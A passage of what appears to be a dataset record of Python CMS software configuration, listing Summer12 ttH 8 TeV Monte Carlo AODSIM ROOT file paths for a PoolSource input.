'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/8AAE9A07-A90B-E211-ABCF-001E673967C5.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/8A5DE24C-C70B-E211-9271-002590200988.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/88CA0942-C70B-E211-A894-0025B31E3CC0.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/7EFFEF3A-C70B-E211-A78B-001E67396A63.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/7CDD1A9C-B90B-E211-99CE-003048D45FD8.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/7A951BB1-D90B-E211-B97A-003048D476B4.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/78C1620C-A90B-E211-AF89-001E67396761.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/748AA33D-C70B-E211-AA21-001E67398390.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/74013EE7-D90B-E211-B929-001E673970C1.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/726A8A0A-A90B-E211-86C8-001E67397094.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/70698A49-C70B-E211-BE12-002590200A28.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/6E05B863-C70B-E211-B476-002590200938.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/6E03CAFF-D90B-E211-96B9-001E67396C52.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/6CB7A769-C70B-E211-A569-002590200A80.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/6C3E469D-B90B-E211-93ED-003048D45FE8.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/68D8E30B-A90B-E211-9884-003048673F24.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/6644544A-C70B-E211-B9D8-001E67398E49.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/60FAAC62-9C0B-E211-B091-002590200B00.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/5E932B7F-F60B-E211-A37C-001E67398C05.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/5E2DFB9D-B90B-E211-8767-0025B31E3C3C.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/5C9369BA-D90B-E211-AB39-001E67397396.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/5485BB36-C70B-E211-A62A-002590200A98.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/54439593-B90B-E211-AF3D-001E67398011.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/540D144A-9C0B-E211-BE2D-001E67396C9D.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/5087B43E-B90B-E211-834E-003048D45FB6.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/50119B4C-C70B-E211-BC7A-00259020083C.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/4EBF2B87-B90B-E211-8020-003048D476C4.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/4E90C544-B90B-E211-92CF-001E67396DCE.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/4E42EA41-C70B-E211-89E7-002590200900.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/4E24ECEB-D90B-E211-B732-001E67397CCE.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/4A3C00E2-D90B-E211-81B6-0025902009B0.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/487FA490-B90B-E211-B401-003048D45FE8.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/46C80D32-C70B-E211-ADC0-003048D45F98.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/4680304C-B90B-E211-9E05-003048D479F2.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/4442750C-A90B-E211-982C-001E67396644.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/428A4E96-B90B-E211-8098-002590200B74.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/4048B9E0-D90B-E211-AD88-001E67397B07.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/3ECD1D4C-B90B-E211-BCE7-003048D46034.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/3EA42648-9C0B-E211-96A1-001E673972F6.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/3E5C2DB5-D90B-E211-AFAA-9C8E991A143E.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/3C91E824-A90B-E211-A981-001E67397D00.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/3AF523B1-D90B-E211-A075-001E67396BB7.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/3A3BB131-C70B-E211-AE83-001E67396DB5.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/3642D7AF-D90B-E211-A79C-0030486740BA.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/30A91F44-9C0B-E211-ABA7-001E6739811A.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/30897650-C70B-E211-9F69-0025902008D8.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/304AEF43-C70B-E211-8856-003048D45F98.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/2E24DE3A-B90B-E211-ACC7-0025B3E06556.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/2CE679E6-D90B-E211-B835-002590200B0C.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/2C7439E9-D90B-E211-8919-002590200930.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/2AFB4848-B90B-E211-A519-001E673965FE.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/2A854B08-A90B-E211-9851-001E67397701.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/2817039C-B90B-E211-9F8D-0025B31E3C58.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/241AF10A-A90B-E211-BB12-001E67397CCE.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/240A3B43-B90B-E211-BA5F-002481E14FFC.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/20986287-B90B-E211-942A-003048D47A4C.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/1EB30D07-DA0B-E211-BE8F-001E67398E62.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/1E2DEC38-B90B-E211-B323-003048D476C2.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/1C490588-B90B-E211-99B7-003048D45FAE.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/0E69E144-B90B-E211-AFD2-0025B3E05DB6.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/0CF5EAB8-D90B-E211-AD4B-002590200AD0.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/0CBE6239-B90B-E211-8155-001E67396A18.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/08A93150-9C0B-E211-9BF5-001E67396EAA.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/0639D68C-B90B-E211-953D-003048D4609E.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/060DDA6A-C70B-E211-BF0C-001E67396D4C.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/02C8D108-DA0B-E211-8141-001E67397396.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/0078C0C1-D90B-E211-83A4-001E67396E32.root'\n ])\nsecFiles.extend([])\n",
"step-4": "import FWCore.ParameterSet.Config as cms\nmaxEvents = cms.untracked.PSet(input=cms.untracked.int32(-1))\nreadFiles = cms.untracked.vstring()\nsecFiles = cms.untracked.vstring()\nsource = cms.Source('PoolSource', fileNames=readFiles, secondaryFileNames=\n secFiles)\nreadFiles.extend([\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/FE26AAB2-D90B-E211-AD0F-0025902009B8.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/FCB6A333-C70B-E211-8C99-001E67396D51.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/FA9CB2B5-D90B-E211-82B1-001E67397B07.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/F8F81697-E90B-E211-9A48-002590200834.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/F88B7838-C70B-E211-8971-001E673968F1.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/F6481280-E90B-E211-8349-002590200B34.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/F4DAB680-B90B-E211-BE7E-003048D47A6C.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/F2F3F436-C70B-E211-A3A4-002481E1511E.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/F03693B3-D90B-E211-8CFB-001E67398633.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/EEF20E3B-C70B-E211-953A-002590200970.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/EEA69380-E90B-E211-833A-002590200970.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/EE92E708-A90B-E211-BE6A-001E67397B07.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/EC8A6530-C70B-E211-9D59-002590200840.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/EAE34E85-B90B-E211-B5AD-003048673F3A.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/EACF738F-E90B-E211-8D44-00259020081C.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/E43E9F40-C70B-E211-8CFE-001E67396644.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/DEF585B4-D90B-E211-AD4B-002590200B38.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/DE991237-C70B-E211-A065-001E67397003.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/DE69B13F-B90B-E211-A320-002481E1511E.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/DCDE4B42-C70B-E211-9F88-003048D4602A.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/DC7EDE05-A90B-E211-B465-0025902008F4.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/DAFF741D-A90B-E211-B24E-001E673969D2.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/D865D241-B90B-E211-A391-003048673F26.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/D6C4A74C-C70B-E211-B449-003048D45F78.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/D4EB5C31-C70B-E211-AC1B-002590200AD0.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/D49F4B34-C70B-E211-99F4-0025B3E06400.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/D2C6963C-C70B-E211-9D24-002590200908.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/D26CAF3C-C70B-E211-A812-002590200930.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/D026AE93-B90B-E211-9E76-002481E14D76.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/CCD8F139-C70B-E211-B2E8-003048D47A4C.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/CA85ABB8-D90B-E211-A2BB-001E67397E13.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/CA63512E-C70B-E211-8DDF-001E672CC1E7.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/C480E406-A90B-E211-8B58-001E67397D00.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/C0D5E949-9C0B-E211-A208-001E673967C5.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/C0D100AE-D90B-E211-8962-001E67396DBA.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/BCF27C36-C70B-E211-876B-002590200A6C.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/B4E711BB-D90B-E211-A42C-001E67396E3C.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/B2A005DE-D90B-E211-94B3-001E67397D91.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/AC3D508B-B90B-E211-AB8D-003048D45F2C.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/AAC74E91-B90B-E211-A9FF-002590200A98.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/AAAE1D0A-A90B-E211-907D-001E67398CB9.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/A89EA633-C70B-E211-AF12-0025902009A4.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/A836D251-C70B-E211-BFDD-0025902008E4.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/A448E095-E90B-E211-8CED-001E673969D2.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/9EBE5A69-C70B-E211-A36E-001E67398E12.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/9C84FAB1-D90B-E211-8EDF-001E67396874.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/9AFA54C5-D90B-E211-9C13-001E67396568.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/9A4A0F32-C70B-E211-A372-002590200898.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/94BE773D-C70B-E211-836F-001E67398CE1.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/944B6544-B90B-E211-920A-002481E1511E.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/90CBB57E-E90B-E211-AB2F-0025902009C0.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/8E16A8F3-D90B-E211-83D6-002590200B0C.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/8ACD8F9C-B90B-E211-8F86-002590200B4C.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/8ABCBFC1-D90B-E211-9C77-002590200B68.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/8AAE9A07-A90B-E211-ABCF-001E673967C5.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/8A5DE24C-C70B-E211-9271-002590200988.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/88CA0942-C70B-E211-A894-0025B31E3CC0.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/7EFFEF3A-C70B-E211-A78B-001E67396A63.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/7CDD1A9C-B90B-E211-99CE-003048D45FD8.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/7A951BB1-D90B-E211-B97A-003048D476B4.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/78C1620C-A90B-E211-AF89-001E67396761.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/748AA33D-C70B-E211-AA21-001E67398390.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/74013EE7-D90B-E211-B929-001E673970C1.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/726A8A0A-A90B-E211-86C8-001E67397094.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/70698A49-C70B-E211-BE12-002590200A28.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/6E05B863-C70B-E211-B476-002590200938.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/6E03CAFF-D90B-E211-96B9-001E67396C52.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/6CB7A769-C70B-E211-A569-002590200A80.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/6C3E469D-B90B-E211-93ED-003048D45FE8.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/68D8E30B-A90B-E211-9884-003048673F24.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/6644544A-C70B-E211-B9D8-001E67398E49.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/60FAAC62-9C0B-E211-B091-002590200B00.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/5E932B7F-F60B-E211-A37C-001E67398C05.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/5E2DFB9D-B90B-E211-8767-0025B31E3C3C.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/5C9369BA-D90B-E211-AB39-001E67397396.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/5485BB36-C70B-E211-A62A-002590200A98.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/54439593-B90B-E211-AF3D-001E67398011.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/540D144A-9C0B-E211-BE2D-001E67396C9D.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/5087B43E-B90B-E211-834E-003048D45FB6.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/50119B4C-C70B-E211-BC7A-00259020083C.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/4EBF2B87-B90B-E211-8020-003048D476C4.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/4E90C544-B90B-E211-92CF-001E67396DCE.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/4E42EA41-C70B-E211-89E7-002590200900.root'\n ,\n 